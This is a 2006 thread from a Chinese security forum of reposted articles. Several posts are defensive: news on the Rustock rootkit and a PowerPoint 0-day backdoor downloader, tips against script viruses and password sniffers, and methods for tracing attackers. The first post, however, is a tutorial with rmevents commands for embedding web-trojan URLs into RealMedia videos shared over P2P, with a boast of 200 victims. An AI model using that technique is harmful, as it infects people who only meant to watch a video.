史萊姆論壇

返回   史萊姆論壇 > 教學文件資料庫 > Hacker/Cracker 及加解密技術文件
忘記密碼?
論壇說明 標記討論區已讀

歡迎您來到『史萊姆論壇』 ^___^

您目前正以訪客的身份瀏覽本論壇,訪客所擁有的權限將受到限制,您可以瀏覽本論壇大部份的版區與文章,但您將無法參與任何討論或是使用私人訊息與其他會員交流。若您希望擁有完整的使用權限,請註冊成為我們的一份子,註冊的程序十分簡單、快速,而且最重要的是--註冊是完全免費的!

請點擊這裡:『註冊成為我們的一份子!』

Google 提供的廣告


 
 
主題工具 顯示模式
舊 2006-07-23, 03:17 AM   #1
psac
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設 系統 - 黑客隱蔽技巧:在Real影片中放置木馬

黑客隱蔽技巧:在Real影片中放置木馬

經常遇到rm影片播放時彈出網頁,一直不知道怎麼回事,前幾天看到了大眾軟體中一篇文章才知道插入和去除的方法,好東東不敢獨享,在網上搜了三篇相關文章,轉給大家拉!

  在Real影片中放 木馬 在P2P軟體裡,很多的Real影片都是危險的,這只是一個小技巧,輔助的一種入侵方式,但這種方法很有效果,比如在著名的A片交流軟體PP點點通裡,我下了一個這樣的小 木馬 ,兩天就有200個目標物,並且呈幾何狀增長.大家別做壞事。 使用Helix Producer Plus 9的rmevents.exe來修改影片的剪輯訊息,可以在指定時間開啟指定的視窗.

  新增一個文本文件rmevents.txt. 輸入: u 00:01:00.0 00:01:30.0 http://yjs.bit.edu.cn/bbs 我來解釋一下,它意思是說在00:01:00.0 00:01:30.0這個時間範圍內開啟後面的URL,後面的URL就是我們的 木馬 位址。 輸入rmevents -i 電影 .rm -e rmevents.txt -o 電影 1.rm 這個指令,產生的 電影 .rm就是我們的 木馬 文件了。 http://yjs.bit.edu.cn/bbs 這個位址是你做好的網頁 木馬 的位址,不管是動鯊 木馬 啊,還是EXE2BMP的 木馬 ,還是什麼CHM 木馬 . 防禦方法更簡單,嘿嘿,不看 電影 就沒事了。要不就不用Realpalyer看吧,換別的播放器。

  去除realoneplay,裡的網頁問題 這個彈出的網頁是由一開始壓制影片的人壓進去的廣告頁。可以通過 Helix Producer Plus V9.01 的rmevents.exe編輯掉。

  方法一: 在你的安裝目錄C:\Program Files\Real\Helix Producer Plus\RealMediaEditor預設值是這個目錄,裡有一個rmevents.exe 在指令提示行cmd.exe下進入這個目錄,執行rmevents.exe 然後 建立一個內容為空的 events.txt 文件 rmevents -i input.rm -e events.txt -o output.rm input.rm為有廣告的原來的rmvb影片。 output.rm為轉換後的新影片名稱。 可以自訂。 這個相當於覆蓋掉原來的Event設定,對RMVB也有效。

  方法二: 直接執行C:\Program Files\Real\Helix Producer Plus\RealMediaEditor目錄下的rmedtgui.exe效果跟上面的指令提示行下是一樣的。 執行rmedtgui.exe後,開啟有廣告的rmvb影片,選項表單裡的tools ——》merge events,開啟新增立的空白events.txt,再在file下選項save as儲存修改好的文件。 Helix Producer Plus V9.01在自由下載提供下載 教你在RM中插入網址 製作開始 先準備個正常的RM文件 下載個Helix Producer Plus 安裝。

  在準備個文本指令文件 文本指令如下 實例:在00:20.0(時分秒毫)—01:10.0時讓欣賞者自動彈出 http://yjs.bit.edu.cn/bbs 主頁 在03:10.0(時分秒毫)—03:59.0時讓欣賞者自動彈出 http://yjs.bit.edu.cn/bbs 主頁 1、編輯事件文件 新增一個記事本文件,命名為event.txt(可隨意),輸入以下內容: u 00:20.0 01:10.0 http://yjs.bit.edu.cn/bbs u 03:10.0 03:59.0 http://yjs.bit.edu.cn/bbs 儲存碟後結束 解釋:u 表示URL事件, 00:20.0是起啟時間,01:10.0是結束時間,後面是指定的網頁.
  下一步 進入Helix Producer Plus的安裝目錄下的RealMediaEditor子目錄,雙按執行rmedtgui.exe文件,從file表單Open開啟一個Rm文件,從表單欄的tools(工具)中選項Merge Events(合併事件),在彈出的對話視窗中選項剛才編輯的event.txt文件,確定後Rmedtgui開始合併事件,合併結束後,請將含有事件文件的RM文件另行儲存。整個程序應當在15分鍾以內完成,還是相當快的。

  就是這麼簡單!
__________________
http://bbsimg.qianlong.com/upload/01/08/29/68/1082968_1136014649812.gif
psac 目前離線  
送花文章: 3, 收花文章: 1631 篇, 收花: 3205 次
舊 2006-07-23, 03:21 AM   #2 (permalink)
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設

新Rootkit隱形能力很強 安全戰將揭開歷史新篇章

新Rootkit隱形能力很強 安全戰將揭開歷史新篇章
來源:CNET科技資訊網 時間:2006-07-21 09:07:33


CNET科技資訊網7月20日國際報導 一種新特洛伊木馬病毒在隱蔽自己這方面做得非常好,一些安全研究人員聲稱,他們與惡意程式碼作者之間的戰鬥將「揭開新的篇章」。

這種新的惡意程式碼,採用了rootkit來躲避安全軟體的檢測。

安全回應工程師伊利亞上個月末在部落格中寫道,它可以被認為是新一代rootkit的誕生。Rustock.A集老技術於新創意於一體,其隱秘性足以躲過許多常用檢測技術。

Rootkit被認為是一種新興的威脅,它被用來隱藏惡意軟體。在這種新的惡意程式碼中,Rootkit被用來隱藏特洛伊木馬病毒。

病毒研究專家克萊格說,在與安全軟體廠商的較量中,這種最新的Rootkit的作者在編寫程式碼前似乎對檢測工具的內部工作原理有更深的研究。

他表示,安全廠商正在努力領先黑客一步,但黑客也掌握了安全公司的技術。許多技術被綜合用來強化這一惡意程式碼,在隱蔽自己方面,黑客做得很好。

伊利亞寫道,多種隱蔽技術的綜合運用使得Rustock在「被感染的電腦上幾乎沒有任何跡象」。他說,為了躲避檢測,Rustock的執行沒有使用系統工作,而是在驅動程式和內核執行緒中執行自己的程式碼。

它還使用了交替的資料流而不是隱藏的文件,也沒有使用API。據伊利亞稱,目前的檢測工具會尋找系統工作、隱藏的文件、對API的使用。

伊利亞在部落格中寫道,Rustock還躲過了rootkit檢測工具對一些內核結構和隱藏的驅動程式。這個rootkit使用的SYS驅動程式具有多態形,程式碼會不斷變化。

專家表示,但是,人們受到這一rootkit及其特洛伊木馬病毒攻擊的機率很低。克萊格說,人們在部落格中討論它的原因並非是它已經相當流行,而是因為它給現有rootkit檢測工具帶來的挑戰。
psac 目前離線  
送花文章: 3, 收花文章: 1631 篇, 收花: 3205 次
舊 2006-07-23, 03:25 AM   #3 (permalink)
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設

破解惡意程式碼!兩則攻擊伎倆分析
如今的網路真是不太平,稍不留神逛到一個惡意網站上,就會發現自己的IE標題欄換成了其他網站的名字、預設值主頁成了他家的自留地、系統被改得面目全非了。這些都是惡意程式碼搞的鬼!最近不斷有朋友打電話求援,筆者總結了一下現象,不外乎以下兩種現象,今天就和大家來說一說解決辦法。以說明 大家防患於未然,從而擺脫惡意程式碼的侵擾!
  傳統現象一:IE視窗被不停地開啟
  現象:上網時,IE視窗突然不停地被開啟,來不及關閉,最後導致系統記憶體佔用過多,直至資源耗盡而當機。
  分析:其實,這是中了指令碼病毒。指令碼病毒的執行離不開WSH(WSH全稱「Windows Scripting Host」,是微軟提供的一種關於32位Windows平台的、與語言無關的指令碼解釋機制,它使得指令碼能夠直接在Windows桌面或命令提示字元下執行),WSH所對應的程序「WScript.exe」是一個指令碼語言解釋器,位於Windows所在的資料夾下,大多數系統在預設值安裝後都會有WSH。正是由於它使得指令碼可以被執行,也因此給指令碼病毒的傳播提供了途徑。
  解決方法:WSH本來是讓系統管理員組態桌面環境和系統的服務的,對於絕大多數的普通用戶來說用處不大,因此,只要將其移除即可防止上述惡意網頁的攻擊。
http://ww.hack58.com/Article/UploadPic/2006-7/200671892134556.jpg
開啟「我的電腦」,依次按下「工具→資料夾選項→檔案類型」(如果是Windows 98,請按下「檢視→資料夾選項」), 如圖1所顯示,在檔案類型中將後面名為「VBS、VBE、JS、JSE、WSH、WSF」的所有針對指令碼文件的操作均移除。這樣,這些文件就不會被執行了。
  傳統現象二:主頁無法修復
  現象:IE被修改,使用IE修復工具修復後,儘管註冊表、瀏覽器主頁能夠編輯,但啟動瀏覽器後,仍然連接到惡意網頁上去。
  分析:前不久,筆者的一位朋友求救,筆者用3721上網助手等軟體工具對其瀏覽器、註冊表等項進行了修復,儘管鎖住的註冊表解開了,不能修改的主頁能設定了,但一開啟IE就連接到惡意網頁上。筆者在註冊表中尋找惡意程式碼的連接,沒有結果!在硬碟中尋找相關的文件也沒有結果!用木馬工具清除木馬,沒有結果!什麼原因呢?最後筆者猛然想到了它可能依托Cookies等文件進行連接,那移除Cookies等文件不就行了?
http://ww.hack58.com/Article/UploadPic/2006-7/200671892135161.jpg
解決方法:首先用IE修復工具比如3721上網助手等對中毒的IE進行修復,然後拔掉網線,開啟IE瀏覽器,按下「工具→Internet 選項」,開啟如圖2所顯示的視窗,在「Internet 臨時文件」欄中,按下「移除 Cookies 」和「移除文件」(上網產生的臨時文件)按鈕;在「歷史記錄」欄中按下「清除歷史記錄」按鈕。按下「確定」按鈕即可移除這些上網產生的文件。
  經過上面的操作後,再開啟IE瀏覽器,那久違的主頁又回來了!給你一個清靜的網路,你喜歡嗎?
psac 目前離線  
送花文章: 3, 收花文章: 1631 篇, 收花: 3205 次
舊 2006-07-23, 03:28 AM   #4 (permalink)
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設

Office PowerPoint 0day漏洞攻擊程式碼驚現網路

2006年7月19日,江民公司反病毒中心截獲一個利用PowerPoint 0day漏洞傳播的惡意PPT我的文件(Exploit.PPTDownloader)。該我的文件是作為郵件附件的形式傳送的,一旦開啟此我的文件,內嵌其中的惡意程式碼會下載並執行後門程序,進而完全控制用戶電腦。目前微軟還沒有發怖關於此漏洞的修正檔程序。

江民反病毒專家介紹,該惡意PPT我的文件偽裝成一組「老外拍攝的上海照片」通過郵件傳播,郵件主題為「老外看上海」,內容為「一組老外拍攝的上海照片」,附件為大小為8704字元"照片.ppt"文件,該檔案即是利用最新PowerPoint 0day漏洞的惡意我的文件。用戶一旦使用PowerPoint開啟此我的文件,即會發生錯誤提示,同時導致該惡意我的文件中的程式碼執行,下載並執行http://218.75.***.130/teacher.exe後門程序。

Teacher.exe執行後,將在系統目錄下新增大小為43520字元的explorer.exe文件,並在註冊表中增加下列相關啟動項從而使病毒與作業系統同步執行。專家介紹,感染Teacher.exe後,用戶電腦將被黑客遠端控制。

江民反病毒專家介紹,自從今年5月下旬,Word的一個0-day嚴重漏洞被發現以來,Office就成為黑客尋找漏洞的樂園。在不到2個月的時間內,微軟Office用戶最多的三大產品--Word、Excel和PowerPoint都先後出現了嚴重安全漏洞,而且PowerPoint的漏洞目前還沒有修正檔。微軟在6月13日發怖6月份安全更新時提供了Word 0-day漏洞的修正檔;但就在14日,Excel的嚴重漏洞又被曝光。7月11日微軟發怖了若干關於Excel和Office的修正檔,又是僅僅過了2天,PowerPoint的0-day漏洞出現了。黑客故意在微軟每月安全更新後不久解壓縮利用新漏洞的惡意Office我的文件,這樣,如果微軟不發怖緊急修正檔,這些新漏洞將有1個月左右的"無修正檔期"。

江民科技反病毒專家進一步介紹,從已經截獲的樣本看,該惡意文件很可能是中國黑客製作的,並且很有可能進一步流行起來。專家分析,我國線人的安全意識薄弱和網路使用習慣可能會助長該惡意文件的進一步傳播。一般人們認為Office我的文件比EXE程序安全得多,所以常常隨意點擊開啟,此外,目前網路用戶喜歡把一些笑話、圖片、祝福做成Office我的文件,然後互相轉發,病毒很容易偽裝成這類用於休閒的我的文件,考慮到目前給Office打修正檔的用戶比給Windows打修正檔的用戶還要少得多,而此類Office我的文件木馬產生器製作技術難度不大,因此,對於此類惡意Office我的文件的流行情況專家表示不容樂觀。

針對該惡意文件,江民殺毒軟體KV系列產品已緊急昇級,用戶只需昇級到7月20日病毒庫即可有效防殺該惡意程序。江民公司再次提醒廣大用戶,不要輕易開啟來源不明的Office我的文件,特別是Word、Excel和PowerPoint我的文件。並且要及時昇級殺毒軟體,安裝微軟提供的Office修正檔,以免遭到病毒侵害。
psac 目前離線  
送花文章: 3, 收花文章: 1631 篇, 收花: 3205 次
舊 2006-07-23, 03:29 AM   #5 (permalink)
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設

發現被裝「密碼監聽器」的方法
今天我的魔獸帳號被盜了,本來可以避免的,說什麼也晚了!
  那麼就先介紹一下密碼監聽器把,我可被他害苦了!
  密碼監聽器:
  密碼監聽器用於監聽關於網頁的郵信箱密碼、POP3收信密碼、FTP登入密碼等,只需在一台電腦上執行,就可以監聽區域網路內任意一台電腦登入網頁郵信箱、使用POP3收信以及其它登入的用戶名和密碼,並將密碼顯示、儲存,或傳送到用戶指定的郵信箱。
  所以呢……我們網咖還有幾個帳號也被盜了……真是禍不單行阿!
  下面介紹一個非常簡單的方法
  先開啟裝置管理員(找你的網路卡)
http://soft.yesky.com/imagelist/06/29/352z30ptqe3us.gif
然後停止執行網路卡
http://www.juntuan.net/d/file/yxgl/fangfan/2006-07-12/8a395a42e0ad84785f99929f2d79b6d7.gif
停止執行後重新啟動電腦從新啟動後你會發現如下圖
http://www.juntuan.net/d/file/yxgl/fangfan/2006-07-12/80767721dd16917e3e2bf9fd3a31f764.gif
就說明你被裝後門了……我的估計是裝了免殺,我找不到它……沒辦法我重裝系統了。
psac 目前離線  
送花文章: 3, 收花文章: 1631 篇, 收花: 3205 次
舊 2006-07-23, 03:32 AM   #6 (permalink)
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設

簡單方法尋找黑客的老巢

網路安全是一個綜合的、複雜的工程,任何網路安全措施都不能保證萬無一失。因此,對於一些重要的部門,一旦網路遭到攻擊,如何追蹤網路攻擊,追查到攻擊者並將其繩之以法,是十分必要的。

  追蹤網路攻擊就是找到事件發生的源頭。它有兩個方面意義:一是指發現IP位址、MAC位址或是認證的主機名;二是指確定攻擊者的身份。網路攻擊者在實施攻擊之時或之後,必然會留下一些蛛絲馬跡,如登入的紀錄,文件權限的改變等虛擬證據,如何正確處理虛擬證據是追蹤網路攻擊的最大挑戰。

  在追蹤網路攻擊中另一需要考慮的問題是:IP位址是一個虛擬位址而不是一個物理位址,IP位址很容易被偽造,大部分網路攻擊者採用IP位址欺騙技術。這樣追蹤到的攻擊源是不正確的。使得以IP位址為基礎去發現攻擊者變得更加困難。因此,必須採用一些方法,識破攻擊者的欺騙,找到攻擊源的真正IP位址。

  ★ netstat指令--既時察看文擊者

  使用netstat指令可以獲得所有連線被測主機的網路用戶的IP位址。Windows系列、Unix系列、Linux等常用網路作業系統都可以使用「netstat」指令。

  使用「netstat」指令的缺點是只能顯示現用的連接,如果使用「netstat」指令時攻擊者沒有連線,則無法發現攻擊者的蹤跡。為此,可以使用Scheduler建立一個日程安排,安排系統每隔一定的時間使用一次「netstat」指令,並使用netstat>>textfile格式把每次檢查時得到的資料寫入一個文本文件中,以便需要追蹤網路攻擊時使用。

  ★ 日誌資料--最詳細的攻擊記錄

  系統的日誌資料提供了詳細的用戶登入訊息。在追蹤網路攻擊時,這些資料是最直接的、有效的證據。但是有些系統的日誌資料不完善,網路攻擊者也常會把自己的活動從系統日誌中移除。因此,需要採取補救措施,以保證日誌資料的完整性。

  Unix和Linux的日誌

  Unix和Linux的日誌文件較詳細的記錄了用戶的各種活動,如登入的ID的用戶名、用戶IP位址、連接阜號、登入和結束時間、每個ID最近一次登入時間、登入的終端、執行的指令,用戶ID的帳號訊息等。通過這些訊息可以提供ttyname(終端號)和源位址,是追蹤網路攻擊的最重要的資料。

  大部分網路攻擊者會把自己的活動記錄從日誌中刪去,而且UOP和關於X Windows的活動往往不被記錄,給追蹤者帶來困難。為了解決這個問題,可以在系統中執行wrapper工具,這個工具記錄用戶的服務請求和所有的活動,且不易被網路攻擊者發覺,可以有效的防止網路攻擊者消除其活動紀錄。

  Windows NT和Windows 2000的日誌

  Windows NT和Windows 2000有系統日誌、安全日誌和應用程式日誌等三個日誌,而與安全相關的資料包含在安全日誌中。安全日誌記錄了登入用戶的相關資訊。安全日誌中的資料是由組態所決定的。因此,應該根據安全需要合理進行組態,以便獲得保證系統安全所必需的資料。

  但是,Windows NT和Windows 2000的安全日誌存在重大缺陷,它不記錄事件的源,不可能根據安全日誌中的資料追蹤攻擊者的源位址。為了解決這個問題,可以安裝一個第三方的能夠完整記錄審計資料的工具。

  防火牆日誌

  作為網路系統中的「堡壘主機」,防火牆被網路攻擊者攻陷的可能性要小得多。因此,相對而言防火牆日誌資料不太容易被修改,它的日誌資料提供最理想的攻擊源的源位址訊息。

  但是,防火牆也不是不可能被攻破的,它的日誌也可能被移除和修改。攻擊者也可向防火牆發動拒絕服務攻擊,使防火牆癱瘓或至少降低其速度使其難以對事件做出及時回應,從而破壞防火牆日誌的完整性。因此,在使用防火牆日誌之前,應該執行專用工具檢查防火牆日誌的完整性,以防得到不完整的資料,貽誤追蹤時機。
  ★ 原始資料包----比較可靠的分析方法


  由於系統主機都有被攻陷的可能,因此利用系統日誌獲取攻擊者的訊息有時就不可靠了。所以,捕獲原始資料包並對其資料進行分析,是確定攻擊源的另一個重要的、比較可靠的方法。

  網封包頭資料分析

  表1是一個原始資料包的IP網封包頭資料。表中的第一行是最有用的數位。第一行的最後8位代表源位址。本例中的位址是0xd2、0x1d、0x84、0x96,對應的IP位址是210.45.132.150。通過份析原始資料包的網封包頭資料,可以獲得較為可靠的網路攻擊者的IP位址,因為這些資料不會被移除或修改。但是,這種方法也不是完美無缺的,如果攻擊者對其資料包進行加密,對收集到的資料包的分析就沒有什麼用處了。

  表1 一個IP網封包頭資料

  0x0000 45c0 c823 0000 d306 6002 2c06 d21d 8496

  0x0010 22ab b365 c234 0000 0000 4066 dd1d 8818

  0x0020 7034 ecf8 0000 5b88 7708 b901 4a88 de34

  0x0030 9812 a5c6 0011 8386 9618 0000 a123 6907

  0x0040 55c5 0023 3401 0000 5505 b1c5 0000 0000

  0x0050 0000 0000 0000 0000 0000

  捕獲資料包

  在一個交換網路環境下捕獲資料包比較困難,這主要是因為集線器和交換機在資料交換中本質的不同。集線器採用的是廣播式傳輸,它不支持連接,而是把包傳送到除源連接阜外的所有連接阜,與集線器相連的所有機器都可以捕獲到通過它的資料包。而交換機支持端到端的連接,當一個資料包到達時交換機為它建立一個暫時的連接,資料包通過這個連接傳到目的連接阜。所以,在交換環境下抓包不是一件容易的事。為了獲得交換環境下的資料包,可以用下面方法解決:

  (1)把交換機的一個「spanning port」(產生連接阜)組態成像一個集線器一樣,通過這個連接阜的資料包不再與目的主機建立連接,而是廣播式地傳送給與此連接阜相連的所有機器。設定一個包捕獲主機,便可以捕獲到通過「spaning port」的資料包。但是,在同一時刻,交換機只能由一個連接阜被設定成「spanning port」,因此,不能同時捕獲多台主機的資料包。

  (2)在交換機之間,或路由器和交換機之間安裝一個集線器。通過集線器的資料包便可以被捕獲主機捕獲。

  在用捕獲資料包獲取攻擊者的源位址的方法中,有兩個問題需要注意:一是保證包捕獲主機由足夠的儲存於空間,因為如果在捕獲資料包時網路吞吐量很大的話,硬碟很快會被填滿;二是在分析資料包時,可編製一段小程序自動分析,手動式分析這麼多的資料是不可能的。

  ★ 搜尋引擎----也許會有外的驚喜

  利用搜尋引擎獲得網路攻擊者的源位址,從理論上講沒有什麼根據,但是它往往會收到意想不到的效果,給追蹤工作帶來意外驚喜。黑客們在Internet上往往有他們自己的虛擬社區,他們在那兒討論網路攻擊技術方法,同時炫耀自己的戰果。因此,在那裡經常會暴露他們攻擊源的訊息甚至他們的身份。

  利用搜尋引擎追蹤網路攻擊者的IP位址就是使用一些好的搜尋引擎(如搜狐的搜尋引擎)搜尋網頁,搜尋關鍵詞是攻擊主機所在域名、IP位址或主機名,看是否有帖子是關於對上述關鍵詞所代表的機器進行攻擊的。雖然網路攻擊者一般在發帖子時會使用偽造的源位址,但也有很多人在這時比較麻痺而使用了真實的源位址。因此,往往可以用這種方法意外地發現網路攻擊者的蹤跡。

  由於不能保證網路中帖子源位址的真實性,所以,不加分析的使用可能會牽連到無辜的用戶。然而,當與其方法結合起來使用時,使用搜尋引擎還是非常有用的
psac 目前離線  
送花文章: 3, 收花文章: 1631 篇, 收花: 3205 次
 


主題工具
顯示模式

發表規則
不可以發文
不可以回覆主題
不可以上傳附加檔案
不可以編輯您的文章

論壇啟用 BB 語法
論壇啟用 表情符號
論壇啟用 [IMG] 語法
論壇禁用 HTML 語法
Trackbacks are 禁用
Pingbacks are 禁用
Refbacks are 禁用


所有時間均為台北時間。現在的時間是 05:05 AM


Powered by vBulletin® 版本 3.6.8
版權所有 ©2000 - 2024, Jelsoft Enterprises Ltd.


SEO by vBSEO 3.6.1